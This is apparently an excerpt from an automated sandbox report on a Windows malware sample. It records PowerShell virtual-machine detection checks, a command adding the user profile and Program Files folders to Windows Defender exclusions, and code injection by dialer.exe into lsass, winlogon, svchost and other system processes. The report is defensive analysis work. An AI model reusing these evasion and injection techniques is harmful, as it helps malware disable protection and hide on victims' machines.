      Source: svchost.exe, 00000019.00000000.1783994482.000002A66065D000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: @SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
      Source: svchost.exe, 0000001D.00000000.1816771604.000002295CE00000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcUmRdpServiceDsSvcfhsvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionsvsvcStorSvcWwanSvcvmicvssDevQueryBrokerNgcSvcsysmainNetmanTabletInputServicePcaSvcDisplayEnhancementServiceIPxlatCfgSvcDeviceAssociationServiceNcbServiceEmbeddedModeSensorServicewlansvcCscServiceWPDBusEnumMixedRealityOpenXRSvc
      Source: lsass.exe, 00000018.00000002.2932233766.00000202BFC89000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: pvmicheartbeatNT SERVICE
      Source: svchost.exe, 00000022.00000000.1851113001.000001D5592C3000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: dowvmci
      Source: svchost.exe, 00000022.00000000.1851692594.000001D559400000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware
      Source: svchost.exe, 00000022.00000000.1854193740.000001D5599A5000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
      Source: svchost.exe, 00000022.00000000.1844327938.000001D558DE0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: if(($pr.Name -eq "Caption" -or $pr.Name -eq "Name" -or $pr.Name -eq "PNPDeviceID" -or $pr.Name -eq "AdapterCompatibility" -or $pr.Name -eq "Description" -or $pr.Name -eq "InfSection" -or $pr.Name -eq "VideoProcessor") -and ($pr.Value -match 'VBOX' -or $pr.Value -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VirtualBox' -or $pr.Value -match 'VMware' -or $pr.Value -match 'Oracle Corporation' -or $pr.Value -match 'Microsoft Basic Display Adapter'))
      Source: svchost.exe, 00000022.00000000.1844327938.000001D558DE0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: if(($pr.Name -eq "DeviceId" -or $pr.Name -eq "Caption" -or $pr.Name -eq "Model" -or $pr.Name -eq "PNPDeviceID") -and ($pr.Value -match 'VBOX' -or $pr.Value -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VMware'))
      Source: dwm.exe, 0000001A.00000000.1790714487.000002BAAA00C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
      Source: svchost.exe, 00000022.00000000.1844327938.000001D558DE0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: if(($pr.Name -eq "DeviceId" -or $pr.Name -eq "Caption" -or $pr.Name -eq "Name" -or $pr.Name -eq "PNPDeviceID" -or $pr.Name -eq "Service" -or $pr.Name -eq "Description") -and ($pr.Value -match 'VEN_80EE' -or $pr.Value -match 'VEN_15AD' -or $pr.Value -match 'VBOX' -or $pr.Value -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VMWare' -or $pr.Value -match 'VMware' -or $pr.Value -match '82801FB' -or $pr.Value -match '82441FX' -or $pr.Value -match '82371SB' -or $pr.Value -match 'OpenHCD'))
      Source: C:\Windows\System32\dialer.exeAPI call chain: ExitProcess graph end nodegraph_16-495
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
      Source: C:\Windows\System32\winlogon.exeCode function: 23_2_00000225DC647E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,23_2_00000225DC647E70
      Source: C:\Windows\System32\dialer.exeCode function: 16_2_00007FF6CD4117F8 GetProcessHeap,RtlAllocateHeap,OpenProcess,TerminateProcess,CloseHandle,GetProcessHeap,HeapFree,16_2_00007FF6CD4117F8
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Windows\System32\dialer.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.6103.10668.exeCode function: 0_2_00401159 EntryPoint,memset,SetUnhandledExceptionFilter,__set_app_type,_controlfp,__argc,__argv,_environ,_environ,__argv,__getmainargs,__argc,__argv,_environ,__argc,__argc,exit,0_2_00401159
      Source: C:\Windows\System32\winlogon.exeCode function: 23_2_00000225DC647E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,23_2_00000225DC647E70
      Source: C:\Windows\System32\winlogon.exeCode function: 23_2_00000225DC64B50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,23_2_00000225DC64B50C
      Source: C:\Windows\System32\lsass.exeCode function: 24_2_00000202C0AE7E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,24_2_00000202C0AE7E70
      Source: C:\Windows\System32\lsass.exeCode function: 24_2_00000202C0AEB50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,24_2_00000202C0AEB50C
      Source: C:\Windows\System32\svchost.exeCode function: 25_2_000002A661307E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,25_2_000002A661307E70
      Source: C:\Windows\System32\svchost.exeCode function: 25_2_000002A66130B50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,25_2_000002A66130B50C
      Source: C:\Windows\System32\dwm.exeCode function: 26_2_000002BAAEDB7E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,26_2_000002BAAEDB7E70
      Source: C:\Windows\System32\dwm.exeCode function: 26_2_000002BAAEDBB50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,26_2_000002BAAEDBB50C
      Source: C:\Windows\System32\svchost.exeCode function: 27_2_0000026A879CB50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,27_2_0000026A879CB50C
      Source: C:\Windows\System32\svchost.exeCode function: 27_2_0000026A879C7E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,27_2_0000026A879C7E70
      Source: C:\Windows\System32\svchost.exeCode function: 28_2_00000179537AB50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,28_2_00000179537AB50C
      Source: C:\Windows\System32\svchost.exeCode function: 28_2_00000179537A7E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,28_2_00000179537A7E70
      Source: C:\Windows\System32\svchost.exeCode function: 29_2_000002295D567E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,29_2_000002295D567E70
      Source: C:\Windows\System32\svchost.exeCode function: 29_2_000002295D56B50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,29_2_000002295D56B50C
      Source: C:\Windows\System32\svchost.exeCode function: 30_2_0000025306E67E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,30_2_0000025306E67E70
      Source: C:\Windows\System32\svchost.exeCode function: 30_2_0000025306E6B50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,30_2_0000025306E6B50C
      Source: C:\Windows\System32\svchost.exeCode function: 31_2_000001845B3B7E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,31_2_000001845B3B7E70
      Source: C:\Windows\System32\svchost.exeCode function: 31_2_000001845B3BB50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,31_2_000001845B3BB50C
      Source: C:\Windows\System32\svchost.exeCode function: 32_2_000001ADECD4B50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,32_2_000001ADECD4B50C
      Source: C:\Windows\System32\svchost.exeCode function: 32_2_000001ADECD47E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,32_2_000001ADECD47E70
      Source: C:\Windows\System32\svchost.exeCode function: 34_2_000001D55907B50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,34_2_000001D55907B50C
      Source: C:\Windows\System32\svchost.exeCode function: 34_2_000001D559077E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,34_2_000001D559077E70
      Source: C:\Windows\System32\svchost.exeCode function: 35_2_00000241A9EAB50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,35_2_00000241A9EAB50C
      Source: C:\Windows\System32\svchost.exeCode function: 35_2_00000241A9EA7E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,35_2_00000241A9EA7E70
      Source: C:\Windows\System32\svchost.exeCode function: 36_2_000001CD73197E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,36_2_000001CD73197E70
      Source: C:\Windows\System32\svchost.exeCode function: 36_2_000001CD7319B50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,36_2_000001CD7319B50C
      Source: C:\Windows\System32\svchost.exeCode function: 37_2_000002824E89B50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,37_2_000002824E89B50C
      Source: C:\Windows\System32\svchost.exeCode function: 37_2_000002824E897E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,37_2_000002824E897E70
      Source: C:\Windows\System32\svchost.exeCode function: 38_2_0000021B47B37E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,38_2_0000021B47B37E70
      Source: C:\Windows\System32\svchost.exeCode function: 38_2_0000021B47B3B50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,38_2_0000021B47B3B50C
      Source: C:\Windows\System32\svchost.exeCode function: 39_2_000002087006B50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,39_2_000002087006B50C
      Source: C:\Windows\System32\svchost.exeCode function: 39_2_0000020870067E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,39_2_0000020870067E70
      Source: C:\Windows\System32\svchost.exeCode function: 40_2_000001718426B50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,40_2_000001718426B50C
      Source: C:\Windows\System32\svchost.exeCode function: 40_2_0000017184267E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,40_2_0000017184267E70
      Source: C:\Windows\System32\svchost.exeCode function: 41_2_0000023FD3FAB50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,41_2_0000023FD3FAB50C
      Source: C:\Windows\System32\svchost.exeCode function: 41_2_0000023FD3FA7E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,41_2_0000023FD3FA7E70

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Source: Yara matchFile source: amsi32_7324.amsi.csv, type: OTHER
      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7324, type: MEMORYSTR
      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
      Source: C:\Users\user\AppData\Local\Temp\svc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -ForceJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\winlogon.exe base: 225DC610000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\lsass.exe base: 202C0AB0000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2A6612D0000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\dwm.exe base: 2BAAED80000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 26A87990000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 17953770000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2295D530000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 253067D0000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1845B380000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1ADEBFD0000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1D559040000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 241A9E70000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1CD73160000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2824E860000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 21B473C0000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2086F9D0000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 17183BC0000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 23FD3F70000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1D2A4150000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 275BDF30000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1AAC0260000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 203C9F30000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1B5645B0000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1BB7B2A0000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1C004F60000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 24E2AB40000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2644ADB0000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\spoolsv.exe base: 1990000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 20D25DA0000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 26EF5350000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2A7F0D60000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 23D0FFB0000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1B1C2570000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2108BCF0000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 29166900000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 21C13EF0000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1988D570000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 13869B40000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1E1CC740000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2855DA70000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2BF199D0000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 15AF3890000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 21A03B80000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\sihost.exe base: 1CD40E40000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 151A6530000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 19E29CC0000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 17D7B150000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1BE621A0000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2252F480000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\ctfmon.exe base: 1F28B4B0000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 184683D0000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\explorer.exe base: 7D80000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1972E260000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\dasHost.exe base: 2246C5E0000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 221D5930000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1ECFC650000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1D178740000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1A633B40000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2928D0A0000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\dllhost.exe base: 13DAB4C0000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\smartscreen.exe base: 1A22A640000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 21C6CF30000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\audiodg.exe base: 1D349350000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 23B60D90000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 2135E7B0000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1F22F7C0000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\ApplicationFrameHost.exe base: 1F6E8150000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 20C52340000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 2589DA90000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 1F5602E0000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 20C1A6C0000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 256135A0000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\dllhost.exe base: 1AEA13B0000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\conhost.exe base: 2144D860000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\conhost.exe base: 220E3F20000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\conhost.exe base: 2732B8A0000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 27E57A50000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1A76ED50000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1457A7E0000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 224EC7B0000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\wbem\WMIADAP.exe base: 1D7E5240000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\wbem\WMIADAP.exe base: 1D7E54E0000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\System32\dialer.exeCode function: 16_2_00007FF6CD411DB4 CreateProcessW,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualAlloc,GetThreadContext,WriteProcessMemory,SetThreadContext,ResumeThread,OpenProcess,TerminateProcess,16_2_00007FF6CD411DB4
      Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\winlogon.exe EIP: DC612908Jump to behavior
      Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\lsass.exe EIP: C0AB2908Jump to behavior
      Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 612D2908Jump to behavior
      Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\dwm.exe EIP: AED82908Jump to behavior
      Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 87992908Jump to behavior
      Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 53772908Jump to behavior
      Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 5D532908Jump to behavior
      Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 67D2908Jump to behavior
      Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 5B382908Jump to behavior
      Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: EBFD2908Jump to behavior
      Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 59042908Jump to behavior
      Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: A9E72908Jump to behavior
      Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 73162908Jump to behavior
      Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 4E862908Jump to behavior
      Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 473C2908Jump to behavior
      Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 6F9D2908Jump to behavior
      Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 83BC2908Jump to behavior
      Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: D3F72908Jump to behavior
      Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: A4152908Jump to behavior
      Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: BDF32908Jump to behavior
